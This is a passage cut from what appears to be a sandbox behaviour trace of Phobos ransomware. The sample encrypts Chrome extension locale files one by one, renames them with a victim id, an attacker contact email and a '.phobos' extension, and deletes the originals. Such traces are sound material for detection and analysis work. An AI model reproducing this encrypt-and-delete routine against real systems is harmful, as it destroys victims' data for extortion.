lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb0, lpOverlapped=0x0) returned 1 [0154.940] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.940] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.940] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.940] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.940] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.940] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.940] CloseHandle (hObject=0x14c) returned 1 [0154.940] CloseHandle (hObject=0x130) returned 1 [0154.940] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\messages.json")) returned 1 [0154.941] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.942] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=281) returned 1 [0154.942] CloseHandle (hObject=0x130) returned 1 [0154.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json")) returned 0x2020 [0154.942] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.942] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.942] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.943] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.943] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.943] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x119, lpOverlapped=0x0) returned 1 [0154.944] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0154.944] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0154.945] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.945] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.945] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.945] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.945] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.945] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.946] CloseHandle (hObject=0x130) returned 1 [0154.946] CloseHandle (hObject=0x14c) returned 1 [0154.946] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\messages.json")) returned 1 [0154.947] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.948] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=334) returned 1 [0154.948] CloseHandle (hObject=0x14c) returned 1 [0154.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json")) returned 0x2020 [0154.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.948] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.948] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.949] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.949] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.949] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14e, lpOverlapped=0x0) returned 1 [0154.950] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0154.950] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0154.951] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0154.951] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.951] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.951] CryptDestroyKey (hKey=0xa32de8) returned 1 [0154.951] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.951] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.951] CloseHandle (hObject=0x14c) returned 1 [0154.951] CloseHandle (hObject=0x130) returned 1 [0154.952] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json")) returned 1 [0154.953] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.954] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=197) returned 1 [0154.954] CloseHandle (hObject=0x130) returned 1 [0154.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json")) returned 0x2020 [0154.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.954] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.954] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.955] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.955] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.955] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xc5, lpOverlapped=0x0) returned 1 [0154.961] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0, dwBufLen=0xd0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xd0) returned 1 [0154.961] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xd0, lpOverlapped=0x0) returned 1 [0154.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.963] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.963] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.963] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.963] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.963] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.963] CloseHandle (hObject=0x130) returned 1 [0154.963] CloseHandle (hObject=0x14c) returned 1 [0154.964] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sk\\messages.json")) returned 1 [0154.965] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.965] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=190) returned 1 [0154.965] CloseHandle (hObject=0x14c) returned 1 [0154.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json")) returned 0x2020 [0154.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0154.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0154.965] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.965] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0154.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0154.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32d68) returned 1 [0154.966] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.966] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbe, lpOverlapped=0x0) returned 1 [0154.967] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0154.967] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0154.968] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32e28) returned 1 [0154.968] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0154.968] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0154.968] CryptDestroyKey (hKey=0xa32e28) returned 1 [0154.968] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0154.968] CryptDestroyKey (hKey=0xa32d68) returned 1 [0154.968] CloseHandle (hObject=0x14c) returned 1 [0154.968] CloseHandle (hObject=0x130) returned 1 [0154.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sl\\messages.json")) returned 1 [0154.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0154.970] CreateFileW 